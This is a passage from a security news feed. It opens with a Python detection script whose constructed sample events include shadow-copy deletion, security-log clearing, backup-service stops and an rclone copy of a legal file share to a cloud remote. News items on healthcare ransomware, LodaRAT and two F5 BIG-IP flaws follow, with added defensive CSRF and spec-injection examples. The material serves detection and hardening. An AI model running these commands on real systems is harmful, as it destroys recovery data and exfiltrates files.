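PROTECTED = ("backup", "veeam", "acronis", "defender", "msmpeng", "sophos", "mcafee", "symantec")


def triage(events):
    findings = []
    for i, ev in enumerate(events):
        image, cmd = _basename(ev["image"]), _norm(ev["cmdline"])
        if "syncro" in image:  # assumption: installer/agent file name carries the vendor name
            findings.append(Finding(i, "remote_support_tool", "T1219", image))
        if image == "rclone.exe":
            findings.append(Finding(i, "rclone_by_name", "T1567.002", image))
        elif RCLONE_VERB.search(cmd) and (m := RCLONE_REMOTE.search(cmd)):
            findings.append(Finding(i, "rclone_by_args", "T1567.002", m.group(0)))
        if image == "winscp.exe":
            findings.append(Finding(i, "winscp", "T1048", image))
        if m := SHADOW_DELETE.search(cmd):
            findings.append(Finding(i, "shadow_copy_deletion", "T1490", m.group(0)))
        if m := LOG_CLEAR.search(cmd):
            findings.append(Finding(i, "event_log_clear", "T1070.001", m.group(0)))
        if (m := SERVICE_STOP.search(cmd)) and any(k in cmd for k in PROTECTED):
            findings.append(Finding(i, "backup_or_av_stop", "T1489", m.group(0)))
    return findings


# Constructed sample events in the shape of Sysmon Event ID 1 fields.
SAMPLE_EVENTS = [
    {"image": r"C:\Users\jdoe\Downloads\SyncroSetup.exe",
     "cmdline": r'"C:\Users\jdoe\Downloads\SyncroSetup.exe" /silent'},
    {"image": r"C:\ProgramData\svchost.exe",   # renamed rclone
     "cmdline": r"svchost.exe copy C:\Shares\Legal mega:cases --transfers 16 --config C:\ProgramData\r.conf"},
    {"image": r"C:\Windows\System32\vssadmin.exe",
     "cmdline": "vssadmin.exe Delete Shadows /All /Quiet"},
    {"image": r"C:\Windows\System32\wevtutil.exe", "cmdline": "wevtutil cl Security"},
    {"image": r"C:\Windows\System32\net.exe", "cmdline": "net stop VeeamBackupSvc /y"},
    {"image": r"C:\Windows\System32\Robocopy.exe",   # benign: local copy, no rclone remote
     "cmdline": r"Robocopy C:\Data D:\Backup /MIR"},
    {"image": r"C:\Windows\System32\cmd.exe",        # benign: copy to a UNC share
     "cmdline": r"cmd /c copy report.docx \\fileserver\share\report.docx"},
    {"image": r"C:\Windows\System32\wbem\WMIC.exe", "cmdline": "wmic shadowcopy delete"},
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"event {f.index}: {f.rule} ({f.technique}) <- {f.evidence}")
```

Run against the constructed events, the two benign copies produce nothing while the renamed Rclone is caught by its `mega:` remote; name-based rules alone would have missed it. File-name and command-line matching is still a weak signal on its own, so in production these findings should be correlated with the RMM tool's network destinations and with the user's helpdesk ticket history rather than paged on individually.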

Hive isn’t the only ransomware group to target the healthcare sector, which faces distinct security challenges because of the critical nature of the care it provides to patients and the sensitivity of the personal data involved. The FBI, CISA and HHS also recently warned of a cybercrime group called Daixin Team that has launched ransomware attacks against the healthcare and public health sector since at least June.

In a recent striking example of the impact of cyberattacks on the healthcare sector, systems at CommonSpirit Health, the second-largest non-profit hospital chain in the U.S., were pushed offline after a ransomware attack in early October, causing delays in surgeries and patient care. Government officials at the Aspen Institute Cyber Summit this week pointed to the CommonSpirit Health attack as an example of ransomware remaining at “unacceptable levels,” despite efforts by both the private and public sectors to help companies build resilience and to go after ransomware syndicates through increased law enforcement activity.

“We’ve only seen the [ransomware] problem get worse,” said Paul Abbate, deputy director with the FBI, during the Aspen Institute Cyber Summit. “It’s a highly profitable enterprise for criminal organizations to go after. We’ve seen a higher volume of ransomware attacks and the financial losses are only increasing as well. We’re going to have to come even closer together in preventing victims from being harmed.”

The FBI, CISA and HHS recommended that healthcare organizations take several measures to protect against ransomware attacks, including remediating known flaws (particularly the ones previously targeted by Hive), enabling multi-factor authentication with strong passwords, closing any unused ports and removing any application “not deemed necessary for day-to-day operations.”

<![CDATA[Decipher Podcast: Source Code 11/18]]> lindsey@decipher.sc (Lindsey O’Donnell-Welch) https://duo.com/decipher/decipher-podcast-source-code-11-18 https://duo.com/decipher/decipher-podcast-source-code-11-18

<![CDATA[LodaRAT Malware Evolves With New Functionalities]]> lindsey@decipher.sc (Lindsey O’Donnell-Welch) https://duo.com/decipher/lodarat-malware-evolves-with-new-functionalities https://duo.com/decipher/lodarat-malware-evolves-with-new-functionalities

The LodaRAT malware - a known remote access trojan with extensive data collection and exfiltration capabilities - has steadily evolved over the years with new functionalities, and the malware is being increasingly deployed alongside other malware families, indicating that the RAT has garnered interest from various threat actors, according to new research.

First discovered in September 2016, the remote access trojan has a range of capabilities for spying on victims, such as recording from the microphones and webcams of their devices. The RAT, which is written in AutoIt, appears to be distributed by multiple cybercrime groups that have used it to target numerous verticals.

The malware has evolved continually over the years, improving its espionage capabilities against Android and Windows systems, for instance. On Thursday, researchers said that new LodaRAT variants uncovered in the wild show further changes, with some functionality added and some removed.

“While some of these changes appear to be purely for an increase in speed and efficiency, or reduction in file size, some changes make Loda a more capable malware,” said researchers with Cisco Talos on Thursday. “Many of the LodaRAT samples we analyzed have removed functionality in some way, which may be the author’s attempt to reduce detection rates.”

The biggest addition is a function that automatically copies the RAT’s files onto every mounted removable storage device, a capability that in earlier versions required individual, manually issued commands. One LodaRAT variant was also observed using a new string encoding algorithm intended to speed up the decoding of strings and make execution quicker overall.

Newer variants have also removed several “dead,” or non-functional, commands from the malware’s code. One example is a function that downloads an x64 SQLite3 DLL, which LodaRAT uses to extract data from browser databases, from the official AutoIt website. That download URL now returns an HTTP 404, which made the function “dead” and prevented threat groups from successfully executing it on x64-based targets.


“As it grows in popularity, it is reasonable to expect additional alterations in future. The ease of access to its source code makes LodaRAT an attractive tool for any threat actor who is interested in its capabilities,” said researchers.

Researchers also found LodaRAT increasingly being deployed alongside, or dropped by, other malware families, a sign of interest in the RAT from additional threat groups. For instance, a Neshta binary was seen carrying the payloads for both LodaRAT and the more advanced RedLine information stealer.

Additionally, a previously undocumented variant of VenomRAT, called S500, was observed deploying LodaRAT. S500, which was first advertised in early April on a seller’s Telegram channel, is .NET commodity malware that lets threat groups run hidden desktop environments on infected machines. In one S500 campaign, researchers found LodaRAT being automatically decrypted and dropped on victim systems after execution.

“Although it is a stripped down version of VenomRAT, S500 can still pose a significant threat to an infected host,” said researchers. “Its ability to copy profiles from browsers can lead to serious data and financial loss. As its source code is now publicly available, various threat actors are likely to continue using this variant in the future.”

Researchers said that they expect to see more complex variants of LodaRAT in the future, especially with more threat actors looking to customize the malware.

“In conjunction with the appearance of new variants, it is expected that LodaRAT will continue to be dropped alongside other malware families,” they said. “Being readily available and easy to customize, it has become an attractive tool for some attackers.”

<![CDATA[Code Execution Flaws Found in F5 BIG-IP Appliances]]> dennis@decipher.sc (Dennis Fisher) https://duo.com/decipher/code-execution-flaws-found-in-f5-big-ip-appliances https://duo.com/decipher/code-execution-flaws-found-in-f5-big-ip-appliances

Researchers have disclosed two vulnerabilities in the popular F5 BIG-IP appliances, one of which can lead to remote code execution in some instances and another that allows code execution for authenticated users. F5 has not released updated software versions to address the flaws but has developed hotfixes that customers can request.

Both vulnerabilities affect many versions of the F5 appliances; researchers at Rapid7 discovered them and developed exploitation methods for them. The more serious of the two is a cross-site request forgery (CSRF) bug (CVE-2022-41622) in the BIG-IP SOAP API, which an attacker could exploit to gain remote code execution on a target device if certain preconditions are met.

“F5 Big-IP's SOAP API (the endpoint /iControl/iControlPortal.cgi) does not have cross-site request forgery (CSRF) protection, nor does it require a correct Content-Type or other typical SOAP API protections. Consequently, if a user (who is authenticated to an F5 Big-IP device) visits an attacker-controlled website (or is redirected there via an open redirect or cross-site scripting), an attacker can run arbitrary SOAP commands against the F5 Big-IP SOAP API in the authenticated user's session. That could lead to remote code execution in several different ways,” Ron Bowes of Rapid7 wrote in an explanation of the vulnerabilities.

“The API endpoint for SOAP requests, iControlPortal.cgi, which is accessible at /iControl/iControlPortal.cgi, is a CGI script that is SetUID root — that is, it executes as root. The script authenticates the user via HTTP Basic authentication and accepts XML SOAP requests. The XML API is quite complex with many different API endpoints available to use. We chose the upload_file and create_user_3 endpoints as examples in our PoC, because they demonstrate the impact of the exploit concisely.”

That flaw is not simple to exploit, and Bowes said there are considerable obstacles, including that an attacker would likely need to bypass the SELinux hardening on the devices, which is no mean feat.
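The mechanics in Bowes's description are worth spelling out: the browser attaches the victim's HTTP Basic credentials to any request bound for the appliance, so an attacker's page only has to get the browser to send a POST. What stops that on a well-built XML API is the pair of checks the write-up says were absent: a Content-Type that a cross-site form or `fetch()` cannot produce without a CORS preflight, and an Origin (or Referer) that belongs to the appliance itself. The following is an added example of such a gate, written for this page; it is not F5 code, does not model the BIG-IP endpoint, and the allowed origin `https://bigip.example` and the header values are constructed.

```python
"""CSRF gate for an XML/SOAP management endpoint. Added example illustrating the
protections the Rapid7 write-up says were missing; it is not F5 code and does not
model the BIG-IP API itself."""
from urllib.parse import urlsplit

# Content types a browser will send cross-origin WITHOUT a CORS preflight. A form
# post or fetch() from an attacker's page can only produce these, so an API that
# insists on an XML media type is unreachable from a cross-site request unless
# the server also answers CORS preflights permissively.
SIMPLE_CONTENT_TYPES = {"application/x-www-form-urlencoded", "multipart/form-data", "text/plain"}
ACCEPTED_CONTENT_TYPES = {"text/xml", "application/soap+xml", "application/xml"}
STATE_CHANGING = {"POST", "PUT", "PATCH", "DELETE"}


def _media_type(header_value: str) -> str:
    # "text/xml; charset=utf-8" -> "text/xml"
    return header_value.split(";", 1)[0].strip().lower()


def _origin_of(url: str):
    parts = urlsplit(url)
    return f"{parts.scheme}://{parts.netloc}".lower() if parts.scheme and parts.netloc else None


def csrf_gate(method: str, headers: dict, allowed_origins) -> tuple:
    """Decide whether a request may reach the API. Returns (allowed, reason).

    The browser attaches HTTP Basic credentials automatically, so a valid
    Authorization header says nothing about which site initiated the request;
    the media type and origin checks below do.
    """
    h = {k.lower(): v for k, v in headers.items()}
    if method.upper() not in STATE_CHANGING:
        return True, "safe method"
    media = _media_type(h.get("content-type", ""))
    if media in SIMPLE_CONTENT_TYPES or media not in ACCEPTED_CONTENT_TYPES:
        return False, f"content-type {media or '(missing)'} is not a SOAP/XML type"
    # Browsers attach Origin to cross-site requests (and modern ones to every
    # POST). A request with neither Origin nor Referer is therefore treated as a
    # non-browser client, which a web page cannot drive on a logged-in user's
    # behalf; tighten this to a hard reject if the API has no such clients.
    origin = h.get("origin") or (_origin_of(h["referer"]) if "referer" in h else None)
    if origin is not None and origin.lower() not in {o.lower() for o in allowed_origins}:
        return False, f"origin {origin} is not this appliance"
    return True, "ok"


if __name__ == "__main__":
    allowed = {"https://bigip.example"}
    lure = {"Content-Type": "application/x-www-form-urlencoded",
            "Origin": "https://attacker.example", "Authorization": "Basic ..."}
    legit = {"Content-Type": "text/xml; charset=utf-8",
             "Origin": "https://bigip.example", "Authorization": "Basic ..."}
    print(csrf_gate("POST", lure, allowed))
    print(csrf_gate("POST", legit, allowed))
```

The media-type check alone depends on the browser honouring CORS, which is why the origin check is kept alongside it; a per-session anti-CSRF token carried in a custom header is the third layer most frameworks add, and a custom header also forces a preflight. None of this helps a client that is itself compromised, which is the separate scenario the second F5 bug describes.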

The second vulnerability (CVE-2022-41800) is less serious, but could allow an attacker to run shell commands on a target device under some circumstances. The attacker would need to be authenticated, however, and Bowes said he considers the risk of the bug to be low.

“F5 Big-IP's JSON API includes an administrator-only endpoint that creates an RPM specification file (.rpmspec). That file is consumed by another administrator-only endpoint to create an RPM file. Both endpoints are vulnerable to injection attacks into the RPM spec file, where additional fields could be added to the spec using newlines. Notably, an attacker could add executable shell commands that run when the resultant RPM file is created,” Bowes said.

“This would give authenticated administrators (who may be malicious insiders, users of compromised accounts, etc) the ability to run shell commands using an endpoint that is not designed or documented as having that functionality.”
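The injection Bowes describes is the familiar one of building a line-oriented file by string interpolation: a value that contains a newline becomes a new line of the spec, and in an RPM spec a line beginning with `%` can open a section whose body is shell. The following is an added example that places that pattern beside an allowlisted one; it is not F5 code, does not reproduce the BIG-IP endpoint, and the field policy (single tokens for Name/Version/Release, control-character-free text elsewhere) is an assumption made for the example rather than RPM's actual grammar. The injected value uses a harmless `echo`.

```python
"""Spec-file construction: the injectable pattern beside an allowlisted one.
Added example for the bug class Rapid7 describes; it is not F5 code and the
field policy below is an assumption made for the example, not RPM's grammar."""
import re

# One token for Name/Version/Release; free text for Summary/License, with no
# control characters (CR/LF would start a new line, i.e. a new tag or section)
# and no '%' (which could smuggle a macro or a section header such as %build).
TOKEN = re.compile(r"[A-Za-z0-9][A-Za-z0-9._+~-]{0,127}")
TEXT = re.compile(r"[^%\x00-\x1f\x7f]{1,200}")
POLICY = {"Name": TOKEN, "Version": TOKEN, "Release": TOKEN, "Summary": TEXT, "License": TEXT}


def render_spec(fields: dict) -> str:
    """The 'before' form: values are interpolated verbatim. A Version of
    "1.0\\n%build\\n<command>" therefore yields a spec with its own %build section."""
    preamble = "".join(f"{tag}: {fields[tag]}\n" for tag in POLICY)
    return f"{preamble}\n%description\n{fields.get('description', '')}\n"


def build_spec(fields: dict) -> str:
    """The hardened form: every value must match its allowlist before rendering."""
    for tag, pattern in POLICY.items():
        value = fields.get(tag, "")
        if not pattern.fullmatch(value):
            raise ValueError(f"{tag} rejected: {value!r}")
    # %description is legitimately multi-line, so validate it line by line.
    for line in fields.get("description", "").splitlines():
        if line and not TEXT.fullmatch(line):
            raise ValueError(f"description line rejected: {line!r}")
    return render_spec(fields)


def rejects(fields: dict) -> bool:
    try:
        build_spec(fields)
        return False
    except ValueError:
        return True


# Constructed inputs.
GOOD = {"Name": "ops-tool", "Version": "1.0", "Release": "1", "Summary": "Internal tooling",
        "License": "MIT", "description": "Built by the ops team.\nNothing to see here."}
EVIL = dict(GOOD, Version="1.0\n%build\necho injected")

if __name__ == "__main__":
    print(render_spec(EVIL))             # contains a %build section the caller never asked for
    print(rejects(EVIL), rejects(GOOD))  # True False
```

Rejecting with an allowlist rather than stripping `\r` and `\n` is deliberate: sanitising would have let `%{...}` macro expansions and `%`-prefixed section headers through, and a rejected request leaves an audit trail where a silently cleaned one does not.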

Both vulnerabilities affect versions 13.x, 14.x, 15.x, 16.x, and 17.x of the F5 BIG-IP software. CVE-2022-41622 also affects versions 7.x and 8.x of the BIG-IQ Centralized Management product. F5 said it is not aware of any exploitation of these flaws at this point.